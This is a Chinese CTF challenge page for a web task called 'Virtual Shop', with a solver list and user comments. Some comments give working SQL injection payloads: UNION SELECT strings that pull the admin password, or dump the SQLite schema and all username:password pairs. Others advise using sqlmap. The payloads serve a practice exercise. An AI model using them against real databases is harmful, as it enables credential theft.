Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
174
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
![](/static/images/face.webp)
miko88 攻破了该题 2天前
![](/static/images/face.webp)
寻找核弹 攻破了该题 2天前
![](/static/images/face.webp)
173360290 攻破了该题 3天前
![](/static/images/face.webp)
refrain001 攻破了该题 5天前
![](/static/images/face.webp)
bu5yer 攻破了该题 6天前
![](/static/images/face.webp)
skyhigh 攻破了该题 7天前
![](/static/images/face.webp)
Jupiter 攻破了该题 7天前
![](/upload/user/20240718/a119638564e3ca270d1456696e777bf7.webp)
XmN<=GzR 攻破了该题 9天前
![](/upload/user/20210404/e7d36da1ea56aacf22c848c1e5bd2112.webp)
Kevin_xiao 攻破了该题 11天前
![](/upload/user/20210728/1e7045c5275531de07c865aa2c2140f2.gif)
fuhuameng 攻破了该题 12天前
![](/upload/user/20240301/cb2847dc01b085c3992a35a561020df2.webp)
Aiminsun 攻破了该题 19天前
![](/static/images/face.webp)
defguiahhg 攻破了该题 20天前
![](/static/images/face.webp)
5120213588 攻破了该题 22天前
![](/upload/user/20210710/fe7eac0f6fbdd215080b3ae1a03eb145.webp)
brucelsone 攻破了该题 25天前
![](/static/images/face.webp)
ve9etable 攻破了该题 27天前
![](/static/images/face.webp)
469519673 攻破了该题 1月前
![](/static/images/face.webp)
小白小白 攻破了该题 1月前
![](/static/images/face.webp)
wangjf 攻破了该题 1月前
![](/static/images/face.webp)
amobaishi 攻破了该题 1月前
![](/static/images/face.webp)
评论
WCRH 2月前
举报
鬼知道没有登录页面也有sql注入,实在没想的
15614005380 5月前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 6月前
举报
union查询
xiaobai568 7月前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 7月前
举报
sqlmap即可
chaoge 8月前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 9月前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 9月前
举报
sqlmap一下子就出来了
hopeinhand 10月前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了